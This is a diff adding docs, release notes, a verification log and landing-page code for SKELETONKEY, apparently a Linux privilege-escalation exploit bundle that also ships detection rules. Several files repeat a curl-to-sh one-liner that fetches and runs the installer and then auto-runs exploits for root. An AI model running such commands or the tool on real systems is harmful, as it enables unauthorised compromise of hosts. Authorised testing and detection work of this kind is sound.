+The Linux privilege-escalation space is fragmented. Single-CVE PoC
+repos go stale within months. `linux-exploit-suggester` tells you
+what *might* work but doesn't run anything. `auto-root-exploit` and
+`kernelpop` bundle exploits but ship no detection signatures and
+haven't been maintained in years.
+
+**SKELETONKEY** is one curated binary that:
+
+1. Fingerprints the host's kernel / distro / sudo / userland.
+2. Reports which of 28 bundled CVEs that host is still vulnerable
+   to — covering 2016 through 2026.
+3. With explicit `--i-know` authorization, runs the safest one and
+   gets you root.
+4. Ships matching **auditd + sigma rules** for every CVE so blue
+   teams get the same coverage when they deploy it.
+
+### One command
+
+```bash
+curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \
+  && skeletonkey --auto --i-know
+```
+
+`--auto` ranks vulnerable modules by **exploit safety** —
+structural escapes (no kernel state touched) first, then page-cache
+writes, then userspace cred-races, then kernel primitives, then
+kernel races last — and runs the safest match. If it fails it falls
+back gracefully and tells you the next candidates to try manually.
+
+### What's in the corpus
+
+- **Userspace LPE**: pwnkit (CVE-2021-4034), sudo Baron Samedit
+  (CVE-2021-3156), sudoedit EDITOR escape (CVE-2023-22809)
+- **Page-cache writes**: dirty_pipe (CVE-2022-0847), dirty_cow
+  (CVE-2016-5195), copy_fail family (CVE-2026-31431, 43284, 43500)
+- **Container/namespace**: cgroup_release_agent (CVE-2022-0492),
+  overlayfs (CVE-2021-3493), overlayfs_setuid (CVE-2023-0386),
+  fuse_legacy (CVE-2022-0185)
+- **Kernel primitives**: netfilter (4 CVEs from 2022→2024),
+  af_packet (CVE-2017-7308, CVE-2020-14386), cls_route4
+  (CVE-2022-2588), netfilter_xtcompat (CVE-2021-22555)
+- **Kernel races**: stackrot (CVE-2023-3269), af_unix_gc
+  (CVE-2023-4622), Sequoia (CVE-2021-33909)
+- **Side channels**: EntryBleed kbase leak (CVE-2023-0458)
+- **Graphics**: vmwgfx DRM OOB (CVE-2023-2008)
+- **Userspace classic**: PTRACE_TRACEME (CVE-2019-13272)
+
+Full inventory at
+[CVES.md](https://github.com/KaraZajac/SKELETONKEY/blob/main/CVES.md).
+
+### The verified-vs-claimed bar
+
+Most public PoC repos hardcode offsets for one kernel build and
+silently break elsewhere. SKELETONKEY refuses to ship fabricated
+offsets. Modules with a kernel primitive but no per-kernel
+cred-overwrite chain default to firing the primitive + grooming the
+slab + recording an empirical witness, then return
+`EXPLOIT_FAIL` honestly. The opt-in `--full-chain` engages the
+shared `modprobe_path` finisher with sentinel-arbitrated success
+(it only claims root when a setuid bash actually materializes).
+
+When `--full-chain` needs kernel offsets, you populate them once on
+a target kernel via `skeletonkey --dump-offsets` (parses
+`/proc/kallsyms` or `/boot/System.map`) and either set env vars or
+upstream the entry to `core/offsets.c kernel_table[]` via PR.
+
+### For each side of the house
+
+- **Red team**: stop curating broken PoCs. One tested binary, fresh
+  releases, honest scope reporting.
+- **Sysadmins**: one command, no SaaS, JSON output for CI gates.
+  Fleet-scan tool included.
+- **Blue team**: `skeletonkey --detect-rules --format=auditd | sudo
+  tee /etc/audit/rules.d/99-skeletonkey.rules` and you have coverage
+  for every CVE in the bundle. Sigma + YARA + Falco output also
+  supported.
+
+### Status + roadmap
+
+v0.5.0 today: 28 modules, all build clean on Debian 13 / kernel
+6.12, all refuse-on-patched verified. The embedded offset table is
+empty — operator-populated. Next: empirical validation on a
+multi-distro vuln-kernel VM matrix, then offset-table community
+seeding for common cloud builds.
+
+MIT. Each module credits the original CVE reporter and PoC author
+in its `NOTICE.md`. The research credit belongs to the people who
+found the bugs; SKELETONKEY is the bundling layer.
+
+**Repo:** https://github.com/KaraZajac/SKELETONKEY
+**Release:** https://github.com/KaraZajac/SKELETONKEY/releases/latest
+
+Authorized testing only. Read [docs/ETHICS.md](ETHICS.md) before you
+point this at anything you don't own.
@@ -0,0 +1,163 @@
+## SKELETONKEY v0.7.0 — empirical verification + operator briefing
+
+The headline change since v0.6.0: **22 of 26 CVEs are now empirically
+confirmed against real Linux kernels in VMs**, with verification records
+baked into the binary and surfaced in `--list`, `--module-info`, and
+`--explain`. The four still-unverified entries (`vmwgfx`, `dirty_cow`,
+`dirtydecrypt`, `fragnesia`) are blocked by their target environment
+(VMware-only, ≤4.4 kernel, Linux 7.0 not yet shipping), not by missing
+code — see
+[`tools/verify-vm/targets.yaml`](https://github.com/KaraZajac/SKELETONKEY/blob/main/tools/verify-vm/targets.yaml)
+for the rationale.
+
+### Install
+
+Pre-built binaries below (x86_64 dynamic, x86_64 static-musl, arm64
+dynamic; all checksum-verified). Recommended for new installs:
+
+```bash
+curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh
+skeletonkey --version
+```
+
+Static-musl x86_64 is the default — works back to glibc 2.17, no
+library dependencies.
+
+### What's in this release
+
+**Empirical verification (the big one)**
+- `tools/verify-vm/` — Vagrant + Parallels scaffold. Boots
+  known-vulnerable kernels (stock distro or mainline via
+  `kernel.ubuntu.com/mainline/`), runs `--explain --active` per module,
+  records match/mismatch as JSONL.
+- 22 modules confirmed end-to-end across Ubuntu 18.04 / 20.04 / 22.04 +
+  Debian 11 / 12 + mainline kernels 5.15.5 / 6.1.10.
+- Per-module `verified_on[]` table baked into the binary. `--list` adds
+  a `VFY` column showing ✓ per verified module; footer prints
+  `31 modules registered · 10 in CISA KEV (★) · 22 empirically verified
+  in real VMs (✓)`.
+- `--module-info <name>` adds a `--- verified on ---` section.
+- `--explain <name>` adds a `VERIFIED ON` section.
+
+**`--explain MODULE` — one-page operator briefing**
+
+A single command renders, for any module: CVE / CWE / MITRE ATT&CK /
+CISA KEV status, host fingerprint, **live `detect()` trace** with
+verdict and interpretation, **OPSEC footprint** (what an exploit
+would leave on this host), detection-rule coverage matrix, and
+verification records. Paste-ready for triage tickets and SOC handoffs.
+
+**CVE metadata pipeline**
+
+`tools/refresh-cve-metadata.py` fetches CISA's Known Exploited
+Vulnerabilities catalog + NVD CWE classifications, generates
+`docs/CVE_METADATA.json` + `docs/KEV_CROSSREF.md` + the in-binary
+lookup table. **10 of 26 modules cover KEV-listed CVEs.** MITRE ATT&CK
+technique mapping (T1068 by default; T1611 for container escapes;
+T1082 for kernel info leaks). All surfaced in `--list` (★ column),
+`--module-info`, `--explain`, and `--scan --json` (new `triage`
+sub-object per module).
+
+**Per-module OPSEC notes**
+
+Every module's struct now carries an `opsec_notes` paragraph describing
+the runtime telemetry footprint: file artifacts, dmesg signatures,
+syscall observables, network activity, persistence side effects,
+cleanup behavior. Grounded in source + existing detection rules — the
+inverse of what the auditd/sigma/yara/falco rules look for. Surfaced
+in `--module-info` (text + JSON) and `--explain`.
+
+**119 detection rules across all 4 SIEM formats**
+
+Previously: auditd everywhere, sigma on top-10, yara/falco only on a
+handful. Now: 30/31 auditd, 31/31 sigma, 28/31 yara, 30/31 falco
+(the 3 remaining gaps are intentional skips — `entrybleed` is a pure
+timing side-channel with no syscall/file footprint;
+`ptrace_traceme` and `sudo_samedit` are pure-memory races with no
+on-disk artifacts).
+
+**Test harness**
+
+88 tests on every push: 33 kernel_range / host-fingerprint unit tests
+(`tests/test_kernel_range.c` — boundary conditions, NULL safety,
+multi-LTS, mainline-only) + 55 `detect()` integration tests
+(`tests/test_detect.c` — synthetic host fingerprints across 26
+modules). Coverage report at the end identifies any modules without
+direct test rows.
+
+**`core/host.c` shared host-fingerprint refactor**
+
+One probe of kernel / arch / distro / userns gates / apparmor /
+selinux / lockdown / sudo + polkit versions at startup. Every
+module's `detect()` consumes `ctx->host`. Adds `meltdown_mitigation[]`
+passthrough so `entrybleed` can distinguish "Not affected" (CPU
+immune; OK) from "Mitigation: PTI" (KPTI on; vulnerable to
+EntryBleed) without re-reading sysfs.
+
+**kernel_range drift detector**
+
+`tools/refresh-kernel-ranges.py` polls Debian's security tracker and
+reports drift between the embedded `kernel_patched_from` tables and
+what Debian actually ships. Already used to apply 9 corpus fixes in
+v0.7.0; 9 more `TOO_TIGHT` findings pending per-commit verification.
+
+**Marketing-grade landing page**
+
+[karazajac.github.io/SKELETONKEY](https://karazajac.github.io/SKELETONKEY/)
+— animated hero, `--explain` showcase with line-by-line typed terminal,
+bento-grid features, KEV / verification stat chips. New Open Graph
+card renders correctly on Twitter/LinkedIn/Slack/Discord.
+
+### Real findings from the verifier
+
+A handful of cases that show the project's "verified-vs-claimed bar"
+thesis paying off in real time:
+
+- **`dirty_pipe` on Ubuntu 22.04 (5.15.0-91-generic)** — version-only
+  check would say VULNERABLE (5.15.0 < 5.15.25 backport in our table),
+  but Ubuntu has silently backported the fix into the -91 patch level.
+  `--active` correctly identified the primitive as blocked → OK. Only
+  an empirical probe can tell.
+- **`af_packet` on Ubuntu 18.04 (4.15.0-213-generic)** — our target
+  expectation was wrong; 4.15 is post-fix. Caught + corrected by the
+  verifier sweep.
+- **`sudoedit_editor` on Ubuntu 22.04** — sudo 1.9.9 is the vulnerable
+  version, but the default vagrant user has no sudoers grant to abuse.
+  `detect()` correctly returns PRECOND_FAIL ("vuln version present, no
+  grant to abuse").
+
+### Coverage by audience
+
+- **Red team**: `--auto` ranks vulnerable modules by safety + runs the
+  safest, OPSEC notes per exploit, JSON for pipelines, no telemetry.
+- **Blue team**: 119 detection rules in all 4 SIEM formats, CISA KEV
+  prioritization, MITRE ATT&CK + CWE annotated, `--explain` triage
+  briefings.
+- **Researchers**: Source is the docs. CVE metadata sourced from
+  federal databases. `--explain` shows the reasoning chain. 22 VM
+  confirmations for trust.
+- **Sysadmins**: `--scan` works without sudo. Static-musl binary
+  drops on any Linux. JSON output for CI gates.
+
+### Compatibility
+
+- Default install: static-musl x86_64 — works on every Linux back to
+  glibc 2.17 (RHEL 7, Debian 9, Ubuntu 14.04+, Alpine, anything).
+- Also published: dynamic x86_64 (faster, modern glibc only) and
+  dynamic arm64 (Raspberry Pi 4+, Apple Silicon Linux VMs, ARM
+  servers).
+
+### Authorized testing only
+
+SKELETONKEY runs real exploits. By using it you assert you have
+explicit authorization to test the target system. See
+[`docs/ETHICS.md`](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ETHICS.md).
+
+### Links
+
+- [CVE inventory](https://github.com/KaraZajac/SKELETONKEY/blob/main/CVES.md)
+- [Verification records](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/VERIFICATIONS.jsonl)
+- [KEV cross-reference](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/KEV_CROSSREF.md)
+- [Detection playbook](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/DETECTION_PLAYBOOK.md)
+- [Architecture](https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ARCHITECTURE.md)
+- [Roadmap](https://github.com/KaraZajac/SKELETONKEY/blob/main/ROADMAP.md)
@@ -0,0 +1,30 @@
+{"module":"pwnkit","verified_at":"2026-05-23T19:26:02Z","host_kernel":"5.4.0-169-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"cgroup_release_agent","verified_at":"2026-05-23T19:32:07Z","host_kernel":"5.10.0-27-amd64","host_distro":"Debian GNU/Linux 11 (bullseye)","vm_box":"generic/debian11","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"netfilter_xtcompat","verified_at":"2026-05-23T19:33:56Z","host_kernel":"5.10.0-27-amd64","host_distro":"Debian GNU/Linux 11 (bullseye)","vm_box":"generic/debian11","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"fuse_legacy","verified_at":"2026-05-23T19:35:49Z","host_kernel":"5.10.0-27-amd64","host_distro":"Debian GNU/Linux 11 (bullseye)","vm_box":"generic/debian11","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"dirty_pipe","verified_at":"2026-05-23T19:43:04Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"OK","status":"MISMATCH"}
+{"module":"dirty_pipe","verified_at":"2026-05-23T19:44:38Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"OK","actual_detect":"OK","status":"match"}
+{"module":"entrybleed","verified_at":"2026-05-23T19:50:32Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"overlayfs","verified_at":"2026-05-23T19:52:09Z","host_kernel":"5.4.0-169-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"overlayfs_setuid","verified_at":"2026-05-23T19:54:09Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"sudoedit_editor","verified_at":"2026-05-23T19:56:04Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"PRECOND_FAIL","status":"MISMATCH"}
+{"module":"nft_fwd_dup","verified_at":"2026-05-23T19:57:46Z","host_kernel":"5.10.0-27-amd64","host_distro":"Debian GNU/Linux 11 (bullseye)","vm_box":"generic/debian11","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"ptrace_traceme","verified_at":"2026-05-23T19:59:24Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"?","status":"MISMATCH"}
+{"module":"sudo_samedit","verified_at":"2026-05-23T20:00:52Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"?","status":"MISMATCH"}
+{"module":"af_packet","verified_at":"2026-05-23T20:02:23Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"?","status":"MISMATCH"}
+{"module":"pack2theroot","verified_at":"2026-05-23T20:04:20Z","host_kernel":"6.1.0-17-amd64","host_distro":"Debian GNU/Linux 12 (bookworm)","vm_box":"generic/debian12","expect_detect":"VULNERABLE","actual_detect":"OK","status":"MISMATCH"}
+{"module":"cls_route4","verified_at":"2026-05-23T20:13:16Z","host_kernel":"5.15.0-43-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"nft_payload","verified_at":"2026-05-23T20:15:45Z","host_kernel":"5.15.0-43-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"af_packet2","verified_at":"2026-05-23T20:18:13Z","host_kernel":"5.4.0-169-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"sequoia","verified_at":"2026-05-23T20:20:38Z","host_kernel":"5.4.0-169-generic","host_distro":"Ubuntu 20.04.6 LTS","vm_box":"generic/ubuntu2004","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"ptrace_traceme","verified_at":"2026-05-23T20:23:07Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"sudo_samedit","verified_at":"2026-05-23T20:23:51Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"af_packet","verified_at":"2026-05-23T20:24:35Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"VULNERABLE","actual_detect":"OK","status":"MISMATCH"}
+{"module":"pack2theroot","verified_at":"2026-05-23T20:25:19Z","host_kernel":"6.1.0-17-amd64","host_distro":"Debian GNU/Linux 12 (bookworm)","vm_box":"generic/debian12","expect_detect":"VULNERABLE","actual_detect":"PRECOND_FAIL","status":"MISMATCH"}
+{"module":"sudoedit_editor","verified_at":"2026-05-23T20:26:02Z","host_kernel":"5.15.0-91-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"PRECOND_FAIL","actual_detect":"PRECOND_FAIL","status":"match"}
+{"module":"af_packet","verified_at":"2026-05-23T20:27:39Z","host_kernel":"4.15.0-213-generic","host_distro":"Ubuntu 18.04.6 LTS","vm_box":"generic/ubuntu1804","expect_detect":"OK","actual_detect":"OK","status":"match"}
+{"module":"pack2theroot","verified_at":"2026-05-23T20:28:23Z","host_kernel":"6.1.0-17-amd64","host_distro":"Debian GNU/Linux 12 (bookworm)","vm_box":"generic/debian12","expect_detect":"PRECOND_FAIL","actual_detect":"PRECOND_FAIL","status":"match"}
+{"module":"nf_tables","verified_at":"2026-05-23T21:22:59Z","host_kernel":"5.15.5-051505-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"af_unix_gc","verified_at":"2026-05-23T21:27:13Z","host_kernel":"5.15.5-051505-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"nft_set_uaf","verified_at":"2026-05-23T21:30:41Z","host_kernel":"5.15.5-051505-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
+{"module":"stackrot","verified_at":"2026-05-23T21:34:12Z","host_kernel":"6.1.10-060110-generic","host_distro":"Ubuntu 22.04.3 LTS","vm_box":"generic/ubuntu2204","expect_detect":"VULNERABLE","actual_detect":"VULNERABLE","status":"match"}
@@ -0,0 +1,213 @@
+/* SKELETONKEY landing page — interactive bits.
+ * No frameworks. ~150 lines vanilla JS. Respects prefers-reduced-motion. */
+
+(function () {
+  'use strict';
+
+  const reduceMotion = window.matchMedia('(prefers-reduced-motion: reduce)').matches;
+
+  /* ============================================================
+   * 1. typed install command in the hero
+   * ============================================================ */
+  const installCmd =
+    'curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh \\\n  && skeletonkey --auto --i-know';
+  const typedEl  = document.getElementById('install-typed');
+  const cursorEl = document.getElementById('install-cursor');
+
+  function typeInstall(cb) {
+    if (reduceMotion) {
+      typedEl.textContent = installCmd;
+      if (cursorEl) cursorEl.style.display = 'none';
+      if (cb) cb();
+      return;
+    }
+    let i = 0;
+    function step() {
+      typedEl.textContent = installCmd.slice(0, i);
+      i++;
+      if (i <= installCmd.length) {
+        setTimeout(step, 18 + Math.random() * 22);
+      } else {
+        if (cursorEl) {
+          // keep cursor blinking for 2s, then hide
+          setTimeout(() => { cursorEl.style.display = 'none'; }, 2000);
+        }
+        if (cb) cb();
+      }
+    }
+    step();
+  }
+
+  /* ============================================================
+   * 2. copy install command
+   * ============================================================ */
+  window.copyInstall = function (btn) {
+    const text = installCmd;
+    navigator.clipboard.writeText(text).then(() => {
+      const original = btn.textContent;
+      btn.textContent = 'copied!';
+      btn.classList.add('copied');
+      setTimeout(() => {
+        btn.textContent = original;
+        btn.classList.remove('copied');
+      }, 1500);
+    }).catch(() => {
+      btn.textContent = '(copy failed)';
+      setTimeout(() => { btn.textContent = 'copy'; }, 1500);
+    });
+  };
+
+  /* ============================================================
+   * 3. stat count-up animation on view
+   * ============================================================ */
+  function countUp(el) {
+    const target = parseInt(el.dataset.target, 10);
+    if (!target || reduceMotion) { el.textContent = target; return; }
+    const dur = 1100;
+    const start = performance.now();
+    function tick(now) {
+      const t = Math.min((now - start) / dur, 1);
+      // ease-out
+      const v = Math.round(target * (1 - Math.pow(1 - t, 3)));
+      el.textContent = v;
+      if (t < 1) requestAnimationFrame(tick);
+    }
+    requestAnimationFrame(tick);
+  }
+
+  /* ============================================================
+   * 4. --explain terminal: line-by-line reveal
+   * ============================================================ */
+  const explainHTML = [
+    '\n',
+    '<span class="t-rule">════════════════════════════════════════════════════</span>\n',
+    ' <span class="t-mod">nf_tables</span>   <span class="t-cve">CVE-2024-1086</span>\n',
+    '<span class="t-rule">════════════════════════════════════════════════════</span>\n',
+    ' <span class="t-summary">nf_tables nft_verdict_init UAF (cross-cache) → arbitrary kernel R/W</span>\n',
+    '\n',
+    '<span class="t-header">WEAKNESS</span>\n',
+    '  <span class="t-cwe">CWE-416</span>\n',
+    '  <span class="t-label">MITRE ATT&amp;CK:</span> <span class="t-tech">T1068</span>\n',
+    '\n',
+    '<span class="t-header">THREAT INTEL</span>\n',
+    '  <span class="t-kev-yes">★ In CISA Known Exploited Vulnerabilities catalog (added 2024-05-30)</span>\n',
+    '  <span class="t-label">Affected:</span> 5.14 ≤ K, fixed mainline 6.8; backports: 6.7.2 / 6.6.13 / 6.1.74 / 5.15.149 / 5.10.210\n',
+    '\n',
+    '<span class="t-header">HOST FINGERPRINT</span>\n',
+    '  <span class="t-label">kernel:</span>        5.15.0-43-generic (x86_64)\n',
+    '  <span class="t-label">distro:</span>        Ubuntu 22.04.5 LTS\n',
+    '  <span class="t-label">unpriv userns:</span> ALLOWED\n',
+    '\n',
+    '<span class="t-header">DETECT() TRACE (live; reads ctx->host, fires gates)</span>\n',
+    '<span class="t-i">[i] nf_tables: kernel 5.15.0-43-generic in vulnerable range</span>\n',
+    '<span class="t-i">[i] nf_tables: userns gate passed</span>\n',
+    '<span class="t-i">[i] nf_tables: nft_verdict_init reachable; bug is fireable here</span>\n',
+    '\n',
+    '<span class="t-header">VERDICT:</span> <span class="t-vuln">VULNERABLE</span>\n',
+    '  -&gt; bug is reachable. The OPSEC section below shows what a successful\n',
+    '     exploit() would leave on this host.\n',
+    '\n',
+    '<span class="t-header">OPSEC FOOTPRINT (what exploit() leaves on this host)</span>\n',
+    '  unshare(CLONE_NEWUSER|CLONE_NEWNET) + nfnetlink batch (NEWTABLE +\n',
+    '  NEWCHAIN/LOCAL_OUT + NEWSET verdict-key + NEWSETELEM malformed NFT_GOTO)\n',
+    '  committed twice. msg_msg cg-96 groom; dmesg: KASAN double-free on vuln\n',
+    '  kernels. Cleanup is finisher-gated; no persistent files on success.\n',
+    '\n',
+    '<span class="t-header">DETECTION COVERAGE (rules embedded in this binary)</span>\n',
+    '  <span class="t-check">✓</span> auditd    <span class="t-check">✓</span> sigma    <span class="t-check">✓</span> yara    <span class="t-check">✓</span> falco\n',
+  ];
+  function playExplain(el) {
+    if (reduceMotion) { el.innerHTML = explainHTML.join(''); return; }
+    let i = 0;
+    el.innerHTML = '';
+    function step() {
+      if (i >= explainHTML.length) return;
+      el.innerHTML += explainHTML[i];
+      i++;
+      // pause longer on blank lines to feel like real terminal output
+      const next = explainHTML[i - 1];
+      const delay = next === '\n' ? 60 : (45 + Math.random() * 50);
+      setTimeout(step, delay);
+    }
+    step();
+  }
+
+  /* ============================================================
+   * 5. quickstart tabs
+   * ============================================================ */
+  function initTabs() {
+    const tabs   = document.querySelectorAll('.tab');
+    const panels = document.querySelectorAll('.tab-panel');
+    tabs.forEach((t) => {
+      t.addEventListener('click', () => {
+        const tab = t.dataset.tab;
+        tabs.forEach((x) => x.classList.toggle('active', x === t));
+        panels.forEach((p) => p.classList.toggle('active', p.dataset.tab === tab));
+      });
+    });
+  }
+
+  /* ============================================================
+   * 6. scroll-triggered reveal + first-time triggers
+   * ============================================================ */
+  function initReveal() {
+    if (!('IntersectionObserver' in window) || reduceMotion) {
+      document.querySelectorAll('.reveal').forEach((el) => el.classList.add('in'));
+      // also fire one-shot animations immediately
+      countAllStats();
+      const explainEl = document.getElementById('explain-output');
+      if (explainEl) playExplain(explainEl);
+      return;
+    }
+
+    const obs = new IntersectionObserver((entries) => {
+      entries.forEach((e) => {
+        if (e.isIntersecting) {
+          e.target.classList.add('in');
+          // fire one-shot effects when the right section becomes visible
+          if (e.target.id === 'explain') {
+            const out = e.target.querySelector('#explain-output');
+            if (out && !out.dataset.played) {
+              out.dataset.played = '1';
+              playExplain(out);
+            }
+          }
+          obs.unobserve(e.target);
+        }
+      });
+    }, { threshold: 0.15 });
+
+    document.querySelectorAll('.reveal').forEach((el) => obs.observe(el));
+  }
+
+  function countAllStats() {
+    document.querySelectorAll('.stat-chip .num').forEach(countUp);
+  }
+
+  /* fire the stats count-up as soon as the hero shows */
+  function initStatsCountUp() {
+    if (!('IntersectionObserver' in window) || reduceMotion) {
+      countAllStats();
+      return;
+    }
+    const row = document.getElementById('stats-row');
+    if (!row) return;
+    const o = new IntersectionObserver((es) => {
+      if (es[0].isIntersecting) {
+        countAllStats();
+        o.disconnect();
+      }
+    });
+    o.observe(row);
+  }
+
+  /* ============================================================
+   * boot
+   * ============================================================ */
+  document.addEventListener('DOMContentLoaded', () => {
+    typeInstall();
+    initTabs();
+    initReveal();
+    initStatsCountUp();
+  });
+})();
@@ -0,0 +1,609 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>SKELETONKEY — Linux LPE corpus, VM-verified, SOC-ready detection</title>
+<meta name="description" content="One binary. 31 Linux privilege-escalation modules from 2016 to 2026. 22 of 26 CVEs empirically verified in real Linux VMs. 10 KEV-listed. 119 detection rules across auditd/sigma/yara/falco. MITRE ATT&CK and CWE annotated. --explain gives operator briefings.">
+<meta property="og:title" content="SKELETONKEY — Linux LPE corpus, VM-verified">
+<meta property="og:description" content="31 Linux LPE modules; 22 of 26 CVEs empirically verified in real VMs. 119 detection rules. ATT&CK + CWE + KEV annotated.">
+<meta property="og:type" content="website">
+<meta property="og:url" content="https://karazajac.github.io/SKELETONKEY/">
+<meta property="og:image" content="https://karazajac.github.io/SKELETONKEY/og.png">
+<meta property="og:image:width" content="1200">
+<meta property="og:image:height" content="630">
+<meta name="twitter:card" content="summary_large_image">
+<meta name="twitter:image" content="https://karazajac.github.io/SKELETONKEY/og.png">
+<meta name="theme-color" content="#0a0a14">
+
+<link rel="preconnect" href="https://fonts.googleapis.com">
+<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;500;700&family=Space+Grotesk:wght@500;700&display=swap" rel="stylesheet">
+
+<link rel="stylesheet" href="style.css">
+</head>
+<body>
+
+<!-- gradient mesh background, animated, fixed behind content -->
+<div class="bg-mesh" aria-hidden="true">
+  <div class="mesh-blob mesh-blob-1"></div>
+  <div class="mesh-blob mesh-blob-2"></div>
+  <div class="mesh-blob mesh-blob-3"></div>
+</div>
+
+<nav class="nav">
+  <div class="container nav-inner">
+    <a class="nav-brand" href="#">
+      <span class="nav-mark" aria-hidden="true">◆</span>
+      SKELETONKEY
+    </a>
+    <div class="nav-links">
+      <a href="#corpus">Corpus</a>
+      <a href="#explain">--explain</a>
+      <a href="#detection">Detection</a>
+      <a href="#quickstart">Quickstart</a>
+      <a class="nav-github" href="https://github.com/KaraZajac/SKELETONKEY" aria-label="GitHub">
+        <svg height="18" viewBox="0 0 16 16" width="18" fill="currentColor" aria-hidden="true">
+          <path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z"/>
+        </svg>
+      </a>
+    </div>
+  </div>
+</nav>
+
+<!-- ──────────────── HERO ──────────────── -->
+<header class="hero">
+  <div class="container hero-inner">
+    <div class="hero-eyebrow">
+      <span class="dot dot-pulse"></span>
+      v0.6.0 — released 2026-05-23
+    </div>
+    <h1 class="hero-title">
+      <span class="display-wordmark">SKELETONKEY</span>
+    </h1>
+    <p class="hero-tag">
+      One binary. <strong>31 Linux LPE modules</strong> from 2016 to 2026.
+      <strong>22 of 26 CVEs empirically verified</strong> against real
+      Linux kernels in VMs. SOC-ready detection rules in four SIEM formats.
+      MITRE ATT&amp;CK + CWE + CISA KEV annotated.
+      <span class="hero-tag-pop">--explain gives a one-page operator briefing per CVE.</span>
+    </p>
+
+    <div class="install-block">
+      <div class="install-bar">
+        <span class="install-dots" aria-hidden="true">
+          <i></i><i></i><i></i>
+        </span>
+        <span class="install-title">terminal</span>
+        <button class="copy" onclick="copyInstall(this)" aria-label="Copy install command">copy</button>
+      </div>
